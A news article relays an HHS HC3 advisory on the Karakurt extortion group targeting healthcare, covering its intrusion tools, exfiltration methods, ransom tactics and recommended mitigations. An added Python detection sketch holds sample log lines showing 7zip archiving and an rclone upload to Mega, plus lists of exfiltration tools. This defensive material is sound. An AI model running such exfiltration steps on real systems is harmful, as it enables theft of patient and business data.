HC3 notes Karakurt ransomware group targeting healthcare entities, reports ‘extensive harassment’ campaigns

The U.S. Department of Health & Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has noted at least four attacks by the Karakurt ransomware group affecting the nation’s healthcare and public health sector since June. 

“The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital,” HC3 said in an analyst note. “According to open source reporting, Karakurt typically conducts scanning, reconnaissance, and collection on its targets for an estimated two-month time span. The threat actor gains access to files containing patient names, addresses, Social Security numbers, dates of birth, medical history information, medical diagnosis information, treatment information, medical record numbers, and health insurance information. The threat actor then threatens to release the information unless a ransom is paid,” it adds.

Earlier this month, healthcare IoT security company Cynerio also disclosed in a report that cyberattacks have increasingly targeted healthcare facilities, with widespread and repeated attacks, financial losses measured in the millions, and frequent failures to take basic cybersecurity measures. Although lagging security practices have fueled the cyberattacks, the failures are measured in fatalities rather than fiscal loss.

The Karakurt ransomware group, also known as the Karakurt Team and Karakurt Lair, is a relatively new cybercrime group, with researchers reporting its initial emergence late last year. The HC3 advisory said that the Karakurt attackers claim to steal data and then threaten to auction it off or release it to the public unless they receive payment of the demanded ransom, which has been known to range from US$25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim. 

“The group likely has ties to the Conti ransomware group, either as a business relationship or as a side business with Conti,” HC3 said. “Karakurt is also known for extensive harassment campaigns against victims to shame them. HC3 recommends the Healthcare and Public Health Sector (HPH) be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise,” it adds.

In June, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) issued a joint cybersecurity advisory (CSA) providing information on the Karakurt data extortion group. The hackers have employed various tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. The agencies also provided some recommended actions to mitigate the cyber threats.

The HC3 note observed that once access to a compromised system has been obtained, the Karakurt ransomware group deploys Cobalt Strike beacons to enumerate the network, installs Mimikatz to pull plain-text credentials, uses AnyDesk to obtain persistent remote control, and employs additional situation-dependent tools to elevate privileges and move laterally within the network.

“Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services, such as Filezilla, and cloud storage services including rclone and Mega[dot]nz,” HC3 noted. “Following the exfiltration of data, Karakurt actors present the victim with ransom notes by way of ‘readme[dot]txt’ files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts.”
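As an added illustration, not part of the HC3 note or this article, the following Python sketch turns the exfiltration pattern just described (7zip archiving, then a transfer tool such as rclone or FileZilla pushing very large volumes to cloud storage or FTP) into detection logic run over constructed endpoint and proxy log lines; the log format, process names, host names, and volume threshold are assumptions.

```python
# Added example, not from the HC3 note: log format, process names and
# thresholds below are assumptions chosen to illustrate the reported pattern.
import re
from collections import defaultdict

ARCHIVERS = {"7z.exe", "7za.exe"}                       # 7zip compression step
TRANSFER_TOOLS = {"rclone.exe", "filezilla.exe", "ftp.exe"}
SUSPECT_DESTS = ("mega.nz", "mega.co.nz")               # cloud storage named in the note
VOLUME_THRESHOLD = 500 * 1024**3                         # assumed: 500 GB outbound per host

# Constructed sample events: process creations and per-host outbound byte counts.
SAMPLE_LOGS = """\
kind=proc host=ws01 image=7z.exe cmd="7z a -p -mhe=on C:\\Users\\Public\\out.7z \\\\fs01\\share"
kind=proc host=ws01 image=rclone.exe cmd="rclone copy C:\\Users\\Public\\out.7z mega:backup"
kind=net host=ws01 dst=mega.nz bytes_out=1200000000000
kind=proc host=ws02 image=7z.exe cmd="7z a reports.7z C:\\Reports"
kind=net host=ws02 dst=updates.example.net bytes_out=5000000
kind=proc host=ws03 image=filezilla.exe cmd="filezilla"
kind=net host=ws03 dst=203.0.113.10 bytes_out=900000000000
"""

def parse(line):
    """Split a key=value line into a dict; quoted values keep their quotes."""
    return dict(re.findall(r'(\w+)=("[^"]*"|\S+)', line))

def detect_exfil(log_text):
    """Return {host: [reasons]} for hosts showing at least two exfil indicators."""
    state = defaultdict(lambda: {"archive": False, "tool": False, "dest": False, "bytes": 0})
    for line in log_text.splitlines():
        ev = parse(line)
        s = state[ev["host"]]
        if ev["kind"] == "proc":
            image = ev["image"].lower()
            s["archive"] |= image in ARCHIVERS
            s["tool"] |= image in TRANSFER_TOOLS
        elif ev["kind"] == "net":
            s["bytes"] += int(ev["bytes_out"])
            s["dest"] |= ev["dst"].lower().endswith(SUSPECT_DESTS)
    findings = {}
    for host, s in state.items():
        reasons = []
        if s["archive"] and s["tool"]:
            reasons.append("archiver and transfer tool both executed")
        if s["dest"]:
            reasons.append("upload to cloud storage host named in the advisory")
        if s["bytes"] >= VOLUME_THRESHOLD:
            reasons.append("outbound volume above threshold")
        if len(reasons) >= 2:   # single indicators are common in legitimate backups
            findings[host] = reasons
    return findings
```

Requiring two indicators keeps routine 7zip backups (ws02) and a lone large FTP session (ws03) below the alert line while the full chain on ws01 is flagged.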

The ransom notes reveal the victim has been hacked by the ‘Karakurt Team’ and threaten public release or auction of the stolen data, according to HC3. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code opens a chat application over which victims can negotiate with Karakurt actors to have their data deleted.

Furthermore, Karakurt ransomware victims have reported extensive harassment campaigns by the Karakurt hackers in which employees, business partners, and clients receive numerous emails and phone calls warning them of the breach and encouraging them to negotiate with the hackers to prevent the dissemination of victim data. These communications often include samples of stolen data—primarily personally identifiable information (PII), such as employment records, health records, and financial business records.

Victims who negotiate with the Karakurt ransomware group receive a ‘proof of life’—such as screenshots—showing file trees of allegedly stolen data or, in some cases, actual copies of stolen files. Upon reaching an agreement on the price of the stolen data with the victims, Karakurt actors provide a Bitcoin address—usually a new, previously unused address—to which ransom payments can be made.

HC3 disclosed that upon receiving the ransom, Karakurt hackers provide some form of alleged proof of deletion of the stolen files, such as a screen recording of the files being deleted, a deletion log, or credentials for a victim to log into a storage server and delete the files themselves.

The Karakurt hackers appear to obtain access to victim devices primarily by purchasing stolen login credentials from cooperating partners in the cybercrime community, who provide Karakurt with access to already compromised victims. Another method employed is buying access to already compromised victims via third-party intrusion broker networks.

Some of the common vulnerabilities exploited for initial access in Karakurt events include outdated SonicWall SSL VPN appliances that are vulnerable to multiple recent CVEs, and the Log4j ‘Log4Shell’ vulnerability in Apache Logging Services. Initial access may also be gained through phishing and spear phishing, malicious macros within email attachments, and stolen virtual private network (VPN) or remote desktop protocol (RDP) credentials. Furthermore, HC3 identified the use of outdated Fortinet FortiGate SSL VPN/firewall appliances that are vulnerable to multiple recent CVEs, and of outdated and/or unsupported Microsoft Windows Server instances.

CISA called upon the healthcare sector to implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location. Additionally, operators were called upon to implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.

The agency also recommended regularly backing up data, password-protecting backup copies offline, and ensuring copies of critical data are not accessible for modification or deletion from the system where the data resides. It also suggested installing and regularly updating antivirus software on all hosts and enabling real-time detection, installing updates and patches for operating systems, software, and firmware as soon as they are released, and disabling unused ports.

The healthcare sector must also consider adding an email banner to emails received from outside the organization. In addition, operators must disable hyperlinks in received emails, enforce multi-factor authentication, use National Institute of Standards and Technology (NIST) standards for developing and managing password policies, and require administrator credentials to install software.

Earlier this month, industrial cybersecurity company Dragos disclosed a drop in industrial ransomware incidents for the year’s second quarter, as ransomware groups continued to target industrial organizations and infrastructures, disrupting OT operations. Based on its analysis for the quarter, Dragos observed that Karakurt has been targeting mainly transportation entities, VICE SOCIETY has been targeting only automotive manufacturing entities, while Lockbit 2.0 is the only group that targeted the pharmaceutical, mining, and water treatment sectors.
